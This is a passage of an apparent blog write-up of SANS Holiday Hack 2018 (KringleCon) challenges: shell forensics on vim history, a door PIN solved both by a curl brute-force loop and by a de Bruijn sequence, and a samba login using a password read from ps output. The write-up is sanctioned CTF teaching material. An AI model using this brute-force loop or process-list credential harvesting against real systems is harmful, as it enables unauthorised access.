&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; curl https://cfp.kringlecastle.com/cfp/rejected-talks.csv &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt; /dev/null &lt;span class="p"&gt;|&lt;/span&gt; grep -i &lt;span class="s1"&gt;&amp;#39;Data Loss for Rainbow Teams: A Path in the Darkness&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;qmt3,2,8040424,200,FALSE,FALSE,John,McClane,Director of Security,Data Loss for Rainbow Teams: A Path in the Darkness,1,11&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="de-bruijn-sequences"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id12"&gt;de Bruijn Sequences&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="tangle-coalbox-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id13"&gt;Tangle Coalbox's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, a girl elf has been given a love poem by a boy elf, and ER (Elf
Ressources) has been involved, because a complaint has been made. We're asked
to find the firstname of the elf who received the love poem.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Christmas is coming, and so it would seem,&lt;/span&gt;
&lt;span class="go"&gt;ER (Elf Resources) crushes elves&amp;#39; dreams.&lt;/span&gt;
&lt;span class="go"&gt;One tells me she was disturbed by a bloke.&lt;/span&gt;
&lt;span class="go"&gt;He tells me this must be some kind of joke.&lt;/span&gt;
&lt;span class="go"&gt;Please do your best to determine what&amp;#39;s real.&lt;/span&gt;
&lt;span class="go"&gt;Has this jamoke, for this elf, got some feels?&lt;/span&gt;
&lt;span class="go"&gt;Lethal forensics ain&amp;#39;t my cup of tea;&lt;/span&gt;
&lt;span class="go"&gt;If YOU can fake it, my hero you&amp;#39;ll be.&lt;/span&gt;
&lt;span class="go"&gt;One more quick note that might help you complete,&lt;/span&gt;
&lt;span class="go"&gt;Clearing this mess up that&amp;#39;s now at your feet.&lt;/span&gt;
&lt;span class="go"&gt;Certain text editors can leave some clue.&lt;/span&gt;
&lt;span class="go"&gt;Did our young Romeo leave one for you?&lt;/span&gt;
&lt;span class="go"&gt;- Tangle Coalbox, ER Investigator&lt;/span&gt;
&lt;span class="go"&gt;  Find the first name of the elf of whom a love poem&lt;/span&gt;
&lt;span class="go"&gt;  was written.  Complete this challenge by submitting&lt;/span&gt;
&lt;span class="go"&gt;  that name to runtoanswer.&lt;/span&gt;
&lt;span class="gp"&gt;elf@612b2a7501cc:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's see what files we can see:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@6bb580d3ee2e:~$&lt;/span&gt; ls -lha
&lt;span class="go"&gt;total 5.4M&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 elf  elf  4.0K Dec 14 16:28 .&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 root root 4.0K Dec 14 16:28 ..&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf  elf   419 Dec 14 16:13 .bash_history&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf  elf   220 May 15  2017 .bash_logout&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf  elf  3.5K Dec 14 16:28 .bashrc&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf  elf   675 May 15  2017 .profile&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 elf  elf  4.0K Dec 14 16:28 .secrets&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf  elf  5.0K Dec 14 16:13 .viminfo&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 elf  elf  5.3M Dec 14 16:13 runtoanswer&lt;/span&gt;
&lt;span class="gp"&gt;elf@6bb580d3ee2e:~$&lt;/span&gt; ls -lhaR .secrets/
&lt;span class="go"&gt;.secrets/:&lt;/span&gt;
&lt;span class="go"&gt;total 12K&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 elf elf 4.0K Dec 14 16:28 .&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 elf elf 4.0K Dec 14 16:28 ..&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 elf elf 4.0K Dec 14 16:28 her&lt;/span&gt;
&lt;span class="go"&gt;.secrets/her:&lt;/span&gt;
&lt;span class="go"&gt;total 12K&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 elf elf 4.0K Dec 14 16:28 .&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 elf elf 4.0K Dec 14 16:28 ..&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf 1.9K Dec 14 16:13 poem.txt&lt;/span&gt;
&lt;span class="gp"&gt;elf@6bb580d3ee2e:~$&lt;/span&gt; cat .secrets/her/poem.txt
&lt;span class="go"&gt;Once upon a sleigh so weary, Morcel scrubbed the grime so dreary,&lt;/span&gt;
&lt;span class="go"&gt;Shining many a beautiful sleighbell bearing cheer and sound so pure--&lt;/span&gt;
&lt;span class="go"&gt;  There he cleaned them, nearly napping, suddenly there came a tapping,&lt;/span&gt;
&lt;span class="go"&gt;As of someone gently rapping, rapping at the sleigh house door.&lt;/span&gt;
&lt;span class="go"&gt;&amp;quot;&amp;#39;Tis some caroler,&amp;quot; he muttered, &amp;quot;tapping at my sleigh house door--&lt;/span&gt;
&lt;span class="go"&gt;  Only this and nothing more.&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Then, continued with more vigor, came the sound he didn&amp;#39;t figure,&lt;/span&gt;
&lt;span class="go"&gt;Could belong to one so lovely, walking &amp;#39;bout the North Pole grounds.&lt;/span&gt;
&lt;span class="go"&gt;  But the truth is, she WAS knocking, &amp;#39;cause with him she would be talking,&lt;/span&gt;
&lt;span class="go"&gt;Off with fingers interlocking, strolling out with love newfound?&lt;/span&gt;
&lt;span class="go"&gt;Gazing into eyes so deeply, caring not who sees their rounds.&lt;/span&gt;
&lt;span class="go"&gt;  Oh, &amp;#39;twould make his heart resound!&lt;/span&gt;
&lt;span class="go"&gt;Hurried, he, to greet the maiden, dropping rag and brush - unlaiden.&lt;/span&gt;
&lt;span class="go"&gt;Floating over, more than walking, moving toward the sound still knocking,&lt;/span&gt;
&lt;span class="go"&gt;  Pausing at the elf-length mirror, checked himself to study clearer,&lt;/span&gt;
&lt;span class="go"&gt;Fixing hair and looking nearer, what a hunky elf - not shocking!&lt;/span&gt;
&lt;span class="go"&gt;Peering through the peephole smiling, reaching forward and unlocking:&lt;/span&gt;
&lt;span class="go"&gt;  NEVERMORE in tinsel stocking!&lt;/span&gt;
&lt;span class="go"&gt;Greeting her with smile dashing, pearly-white incisors flashing,&lt;/span&gt;
&lt;span class="go"&gt;Telling jokes to keep her laughing, soaring high upon the tidings,&lt;/span&gt;
&lt;span class="go"&gt;  Of good fortune fates had borne him.  Offered her his dexter forelimb,&lt;/span&gt;
&lt;span class="go"&gt;Never was his future less dim!  Should he now consider gliding--&lt;/span&gt;
&lt;span class="go"&gt;No - they shouldn&amp;#39;t but consider taking flight in sleigh and riding&lt;/span&gt;
&lt;span class="go"&gt;  Up above the Pole abiding?&lt;/span&gt;
&lt;span class="go"&gt;Smile, she did, when he suggested that their future surely rested,&lt;/span&gt;
&lt;span class="go"&gt;Up in flight above their cohort flying high like ne&amp;#39;er before!&lt;/span&gt;
&lt;span class="go"&gt;  So he harnessed two young reindeer, bold and fresh and bearing no fear.&lt;/span&gt;
&lt;span class="go"&gt;In they jumped and seated so near, off they flew - broke through the door!&lt;/span&gt;
&lt;span class="go"&gt;Up and up climbed team and humor, Morcel being so adored,&lt;/span&gt;
&lt;span class="go"&gt;  By his lovely NEVERMORE!&lt;/span&gt;
&lt;span class="go"&gt;-Morcel Nougat&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We find the poem in the &lt;code&gt;.secrets&lt;/code&gt; folder. Good stuff, there, Morcel...
Anyway, I first thought that the name of the elf was Nevermore, however it was
not the case. So let's keep looking.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@6bb580d3ee2e:~$&lt;/span&gt; cat .bash_history
&lt;span class="go"&gt;set -o history&lt;/span&gt;
&lt;span class="go"&gt;whoami&lt;/span&gt;
&lt;span class="go"&gt;echo &amp;quot;No, really...  /-:&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;mkdir -p .secrets/her/&lt;/span&gt;
&lt;span class="go"&gt;firefox https://www.google.com/search?q=love+poetry&lt;/span&gt;
&lt;span class="go"&gt;vim&lt;/span&gt;
&lt;span class="go"&gt;ls -lAR&lt;/span&gt;
&lt;span class="go"&gt;exit&lt;/span&gt;
&lt;span class="go"&gt;set -o history&lt;/span&gt;
&lt;span class="go"&gt;df -h&lt;/span&gt;
&lt;span class="go"&gt;who&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;firefox https://www.google.com/search?q=replacing+strings+in+vim&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;time vim&lt;/span&gt;
&lt;span class="go"&gt;ls -lAR&lt;/span&gt;
&lt;span class="go"&gt;exit&lt;/span&gt;
&lt;span class="go"&gt;set -o history&lt;/span&gt;
&lt;span class="go"&gt;vim&lt;/span&gt;
&lt;span class="go"&gt;exit&lt;/span&gt;
&lt;span class="go"&gt;ls -lA&lt;/span&gt;
&lt;span class="go"&gt;cat .bash_history&lt;/span&gt;
&lt;span class="go"&gt;echo &amp;quot;&amp;quot; &amp;gt;&amp;gt; .bash_history&lt;/span&gt;
&lt;span class="go"&gt;firefox https://www.google.com/search?q=turn+off+bash+history&lt;/span&gt;
&lt;span class="go"&gt;set +o history&lt;/span&gt;
&lt;span class="go"&gt;set +o history&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Apparently, in addition to ripping off love poem from the web, Morcel searched
how to replace strings in &lt;code&gt;vim&lt;/code&gt;. So he must have used &lt;code&gt;vim&lt;/code&gt; to
write the poem. Let's take a look at the &lt;code&gt;.viminfo&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@6bb580d3ee2e:~$&lt;/span&gt; cat .viminfo
&lt;span class="gp"&gt;#&lt;/span&gt; This viminfo file was generated by Vim &lt;span class="m"&gt;8&lt;/span&gt;.0.
&lt;span class="gp"&gt;#&lt;/span&gt; You may edit it &lt;span class="k"&gt;if&lt;/span&gt; you&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;re careful!
&lt;span class="gp"&gt;#&lt;/span&gt; Viminfo version
&lt;span class="go"&gt;|1,4&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; Value of &lt;span class="s1"&gt;&amp;#39;encoding&amp;#39;&lt;/span&gt; when this file was written
&lt;span class="go"&gt;*encoding=latin1&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; hlsearch on &lt;span class="o"&gt;(&lt;/span&gt;H&lt;span class="o"&gt;)&lt;/span&gt; or off &lt;span class="o"&gt;(&lt;/span&gt;h&lt;span class="o"&gt;)&lt;/span&gt;:
&lt;span class="go"&gt;~h&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; Last Substitute Search Pattern:
&lt;span class="hll"&gt;&lt;span class="go"&gt;~MSle0~&amp;amp;Elinore&lt;/span&gt;
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt; Last Substitute String:
&lt;span class="hll"&gt;&lt;span class="gp"&gt;$&lt;/span&gt;NEVERMORE
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt; Command Line History &lt;span class="o"&gt;(&lt;/span&gt;newest to oldest&lt;span class="o"&gt;)&lt;/span&gt;:
&lt;span class="go"&gt;:q&lt;/span&gt;
&lt;span class="go"&gt;|2,0,1546268730,,&amp;quot;q&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;:wq&lt;/span&gt;
&lt;span class="go"&gt;|2,0,1536607231,,&amp;quot;wq&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;:%s/Elinore/NEVERMORE/g&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;|2,0,1536607217,,&amp;quot;%s/Elinore/NEVERMORE/g&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the name of the elf who received the poem seems to be Elinore.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="kringlecon-speaker-unpreparedness-room"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id14"&gt;KringleCon Speaker Unpreparedness room&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're in front of the unprepared speaker room, but there's a code to enter, by
pressing four different symbols, △□○☆:&lt;/p&gt;
&lt;img alt="door_code_intro.png" class="align-center" src="/images/sans-christmas-challenge-2018/door_code_intro.png" /&gt;
&lt;div class="section" id="yannick-s-dirty-solution"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id15"&gt;Yannick's (dirty) solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;By pressing four of the buttons randomly, we get an error message:&lt;/p&gt;
&lt;img alt="door_code_first_incorrect_guess.png" class="align-center" src="/images/sans-christmas-challenge-2018/door_code_first_incorrect_guess.png" /&gt;
&lt;p&gt;If we take a look at the network requests that were made, we can see that a
&lt;code&gt;GET&lt;/code&gt; request was made to the &lt;a class="reference external" href="https://doorpasscoden.kringlecastle.com/checkpass.php?i=0003&amp;amp;resourceId=undefined"&gt;https://doorpasscoden.kringlecastle.com/checkpass.php?i=0003&amp;amp;resourceId=undefined&lt;/a&gt;
URL.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;i&lt;/code&gt; variable seems to be holding our passcode. If we click another
button, another request is directly made to &lt;a class="reference external" href="https://doorpasscoden.kringlecastle.com/checkpass.php?i=0031&amp;amp;resourceId=undefined"&gt;https://doorpasscoden.kringlecastle.com/checkpass.php?i=0031&amp;amp;resourceId=undefined&lt;/a&gt;&lt;/p&gt;
&lt;img alt="door_code_second_incorrect_guess.png" class="align-center" src="/images/sans-christmas-challenge-2018/door_code_second_incorrect_guess.png" /&gt;
&lt;p&gt;We can see that our &lt;code&gt;i&lt;/code&gt; variable went from &lt;code&gt;0003&lt;/code&gt; to &lt;code&gt;0031&lt;/code&gt;.
From this, we can see that:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;△ = 0&lt;/li&gt;
&lt;li&gt;□ = 1&lt;/li&gt;
&lt;li&gt;○ = 2&lt;/li&gt;
&lt;li&gt;☆ = 3&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A four-digit PIN means 10.000 possible values. It's quite easily manageable
by bruteforce, even online. So let's write a simple one-liner that will try
every possible value:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; i in &lt;span class="sb"&gt;`&lt;/span&gt;seq -w &lt;span class="m"&gt;9999&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;https://doorpasscoden.kringlecastle.com/checkpass.php?i=&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="s2"&gt;&amp;amp;resourceId=undefined&amp;quot;&lt;/span&gt; &amp;gt; &lt;span class="nv"&gt;$i&lt;/span&gt;.txt &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt;/dev/null &lt;span class="p"&gt;&amp;amp;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This loop will generate every number between &lt;code&gt;0000&lt;/code&gt; and &lt;code&gt;9999&lt;/code&gt;,
perform a &lt;code&gt;GET&lt;/code&gt; request to the URL that checks the passcode, and save the
output in a file named after the passcode. The &lt;code&gt;&amp;amp;&lt;/code&gt; before the
&lt;code&gt;done&lt;/code&gt; means that our &lt;code&gt;curl&lt;/code&gt; commands will run in their own thread.
After a few seconds, we can list our different files, and sort them by size:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ls -lhSr
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 XXX XXX  46 déc.  31 16:18 0001.txt&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;-rw-r--r-- 1 XXX XXX 142 déc.  31 16:18 0120.txt&lt;/span&gt;
&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat &lt;span class="m"&gt;0120&lt;/span&gt;.txt
&lt;span class="go"&gt;{&amp;quot;success&amp;quot;:true,&amp;quot;resourceId&amp;quot;:&amp;quot;undefined&amp;quot;,&amp;quot;hash&amp;quot;:&amp;quot;0273f6448d56b3aba69af76f99bdc741268244b7a187c18f855c6302ec93b703&amp;quot;,&amp;quot;message&amp;quot;:&amp;quot;Correct guess!&amp;quot;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our largest file was &lt;code&gt;0120.txt&lt;/code&gt;, which gives us the correct passcode,
&lt;code&gt;0120&lt;/code&gt;, which means △□○△. Let's input this on the website:&lt;/p&gt;
&lt;img alt="door_code_correct_guess.png" class="align-center" src="/images/sans-christmas-challenge-2018/door_code_correct_guess.png" /&gt;
&lt;p&gt;This gives us the message &lt;code&gt;Welcome unprepared speaker!&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-official-solution"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id16"&gt;The &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The name of the challenge, and Tangle Coalbox, hint at taking a look at de
Bruijn sequence. Indeed, since the code is tested every time the button is
pressed, we don't have to perform a full bruteforce attack. We can generate a
de Bruijn sequence of four symbols (length of the PIN) chosen in a set of four
symbols (the number of buttons we have). This sequence tells us which buttons
to push. Let's use &lt;a class="reference external" href="http://www.hakank.org/comb/debruijn.cgi"&gt;this website&lt;/a&gt;
to generate our sequence, with parameters &lt;span class="formula"&gt;&lt;i&gt;k&lt;/i&gt; = 4, &lt;i&gt;n&lt;/i&gt; = 4&lt;/span&gt;. The sequence is:&lt;/p&gt;
&lt;blockquote&gt;
0 0 0 0 1 0 0 0 2 0 0 0 3 0 0 1 1 0 &lt;strong&gt;0 1 2 0&lt;/strong&gt; 0 1 3 0 0 2 1 0 0 2 2 0 0 2 3 0 0 3 1 0 0 3 2 0 0 3 3 0 1 0 1 0 2 0 1 0 3 0 1 1 1 0 1 1 2 0 1 1 3 0 1 2 1 0 1 2 2 0 1 2 3 0 1 3 1 0 1 3 2 0 1 3 3 0 2 0 2 0 3 0 2 1 1 0 2 1 2 0 2 1 3 0 2 2 1 0 2 2 2 0 2 2 3 0 2 3 1 0 2 3 2 0 2 3 3 0 3 0 3 1 1 0 3 1 2 0 3 1 3 0 3 2 1 0 3 2 2 0 3 2 3 0 3 3 1 0 3 3 2 0 3 3 3 1 1 1 1 2 1 1 1 3 1 1 2 2 1 1 2 3 1 1 3 2 1 1 3 3 1 2 1 2 1 3 1 2 2 2 1 2 2 3 1 2 3 2 1 2 3 3 1 3 1 3 2 2 1 3 2 3 1 3 3 2 1 3 3 3 2 2 2 2 3 2 2 3 3 2 3 2 3 3 3 3&lt;/blockquote&gt;
&lt;p&gt;If we input this sequence, we get the correct code after pressing only 22
buttons.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="data-repo-analysis"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id17"&gt;Data Repo Analysis&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;After solving the last challenge, stuff begins to happen at KringleCon:&lt;/p&gt;
&lt;img alt="toy_soldier_blue.png" class="align-center" src="/images/sans-christmas-challenge-2018/toy_soldier_blue.png" /&gt;
&lt;p&gt;&lt;em&gt;Here's what's happening&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Suddenly, all elves in the castle start looking very nervous. You can
overhear some of them talking with worry in their voices.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;The toy soldiers, who were always gruff, now seem especially determined as
they lock all the exterior entrances to the building and barricade all the
doors. No one can get out! And the toy soldiers' grunts take on an
increasingly sinister tone.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Uh-oh, seems like sh*t's about to go down! Let's keep solving our challenges,
maybe we'll learn more about this.&lt;/p&gt;
&lt;div class="section" id="wunorse-openslae-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id18"&gt;Wunorse Openslae's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Wunorse Openslae is supposed to upload his report to a samba share, but can't
remember the password. We're supposed to help him uploading his report:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Thank you Madam or Sir for the help that you bring!&lt;/span&gt;
&lt;span class="go"&gt;I was wondering how I might rescue my day.&lt;/span&gt;
&lt;span class="go"&gt;Finished mucking out stalls of those pulling the sleigh,&lt;/span&gt;
&lt;span class="go"&gt;My report is now due or my KRINGLE&amp;#39;s in a sling!&lt;/span&gt;
&lt;span class="go"&gt;There&amp;#39;s a samba share here on this terminal screen.&lt;/span&gt;
&lt;span class="go"&gt;What I normally do is to upload the file,&lt;/span&gt;
&lt;span class="go"&gt;With our network credentials (we&amp;#39;ve shared for a while).&lt;/span&gt;
&lt;span class="go"&gt;When I try to remember, my memory&amp;#39;s clean!&lt;/span&gt;
&lt;span class="go"&gt;Be it last night&amp;#39;s nog bender or just lack of rest,&lt;/span&gt;
&lt;span class="go"&gt;For the life of me I can&amp;#39;t send in my report.&lt;/span&gt;
&lt;span class="go"&gt;Could there be buried hints or some way to contort,&lt;/span&gt;
&lt;span class="go"&gt;Gaining access - oh please now do give it your best!&lt;/span&gt;
&lt;span class="go"&gt;-Wunorse Openslae&lt;/span&gt;
&lt;span class="go"&gt;Complete this challenge by uploading the elf&amp;#39;s report.txt&lt;/span&gt;
&lt;span class="go"&gt;file to the samba share at //localhost/report-upload/&lt;/span&gt;
&lt;span class="gp"&gt;elf@566501e7c881:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I tried the usual suspects: bash history files, looking at
&lt;code&gt;/etc/samba/smb.conf&lt;/code&gt;, looking into &lt;code&gt;/var/log&lt;/code&gt;, looking at
&lt;code&gt;cron&lt;/code&gt; files, checking what I could run with &lt;code&gt;sudo&lt;/code&gt;, etc. This did
not give anything interesting. However, the next usual suspect gave something.
I checked what was running on the server, using &lt;code&gt;ps&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b08c86087276:~$&lt;/span&gt; ps aux &lt;span class="p"&gt;|&lt;/span&gt; less
&lt;span class="go"&gt;USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND&lt;/span&gt;
&lt;span class="go"&gt;root         1  0.0  0.0  17952  2860 pts/0    Ss   22:22   0:00 /bin/bash /sbin/init&lt;/span&gt;
&lt;span class="go"&gt;root        11  0.0  0.0  45320  3060 pts/0    S    22:22   0:00 sudo -u manager /home/manager/&lt;/span&gt;
&lt;span class="go"&gt;samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not&lt;/span&gt;
&lt;span class="go"&gt;-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppress&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;//localhost/report-upload/ directreindeerflatterystable -U report-upload&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;root        16  0.0  0.0  45320  3180 pts/0    S    22:22   0:00 sudo -u elf /bin/bash&lt;/span&gt;
&lt;span class="go"&gt;manager     18  0.0  0.0   9500  2412 pts/0    S    22:22   0:00 /bin/bash /home/manager/samba-&lt;/span&gt;
&lt;span class="go"&gt;wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-a&lt;/span&gt;
&lt;span class="go"&gt;s-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppress //loca&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;lhost/report-upload/ directreindeerflatterystable -U report-upload&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;elf         20  0.0  0.0  18208  3360 pts/0    S    22:22   0:00 /bin/bash&lt;/span&gt;
&lt;span class="go"&gt;root        24  0.0  0.0 316680 15420 ?        Ss   22:22   0:00 /usr/sbin/smbd&lt;/span&gt;
&lt;span class="go"&gt;root        25  0.0  0.0 308372  5704 ?        S    22:22   0:00 /usr/sbin/smbd&lt;/span&gt;
&lt;span class="go"&gt;root        26  0.0  0.0 308388  5516 ?        S    22:22   0:00 /usr/sbin/smbd&lt;/span&gt;
&lt;span class="go"&gt;root        28  0.0  0.0 316664  5868 ?        S    22:22   0:00 /usr/sbin/smbd&lt;/span&gt;
&lt;span class="go"&gt;manager     49  0.0  0.0   4196   660 pts/0    S    22:27   0:00 sleep 60&lt;/span&gt;
&lt;span class="go"&gt;elf         50  0.0  0.0  36636  2860 pts/0    R+   22:27   0:00 ps aux&lt;/span&gt;
&lt;span class="go"&gt;elf         51  0.0  0.0   6556   956 pts/0    S+   22:27   0:00 less&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It seems that some scripts of the &lt;code&gt;manager&lt;/code&gt; user are running, with a
&lt;a class="reference external" href="https://www.xkcd.com/936/"&gt;password&lt;/a&gt; given as a CLI argument. The samba
credentials seem to be &lt;code&gt;report-upload:directreindeerflatterystable&lt;/code&gt;.
Let's try them:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b08c86087276:~$&lt;/span&gt; smbclient -U report-upload //localhost/report-upload directreindeerflattery
&lt;span class="go"&gt;stable&lt;/span&gt;
&lt;span class="go"&gt;WARNING: The &amp;quot;syslog&amp;quot; option is deprecated&lt;/span&gt;
&lt;span class="go"&gt;Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.12-Debian]&lt;/span&gt;
&lt;span class="go"&gt;smb: \&amp;gt; put report.txt&lt;/span&gt;
&lt;span class="go"&gt;putting file report.txt as \report.txt (250.5 kb/s) (average 250.5 kb/s)&lt;/span&gt;
&lt;span class="go"&gt;smb: \&amp;gt; Terminated&lt;/span&gt;
&lt;span class="gp"&gt;elf@b08c86087276:~$&lt;/span&gt;

&lt;span class="go"&gt;                               .;;;;;;;;;;;;;;;&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;                             ,NWOkkkkkkkkkkkkkkNN;&lt;/span&gt;
&lt;span class="go"&gt;                           ..KM; Stall Mucking ,MN..&lt;/span&gt;
&lt;span class="go"&gt;                         OMNXNMd.             .oMWXXM0.&lt;/span&gt;
&lt;span class="go"&gt;                        ;MO   l0NNNNNNNNNNNNNNN0o   xMc&lt;/span&gt;
&lt;span class="go"&gt;                        :MO                         xMl             &amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;                        :MO   dOOOOOOOOOOOOOOOOOd.  xMl             :l:.&lt;/span&gt;
&lt;span class="go"&gt; .cc::::::::;;;;;;;;;;;,oMO  .0NNNNNNNNNNNNNNNNN0.  xMd,,,,,,,,,,,,,clll:.&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;kkkkxxxxxddddddoooooooxMO   ..&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;.        xMkcccccccllllllllllooc.&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;kkkkxxxxxddddddoooooooxMO  .MMMMMMMMMMMMMM,       xMkcccccccllllllllllooool&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;kkkkxxxxxddddddoooooooxMO   &amp;#39;::::::::::::,        xMkcccccccllllllllllool,&lt;/span&gt;
&lt;span class="go"&gt; .ooooollllllccccccccc::dMO                         xMx;;;;;::::::::lllll&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;                        :MO  .ONNNNNNNNXk           xMl             :lc&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;                        :MO   dOOOOOOOOOo           xMl             ;.&lt;/span&gt;
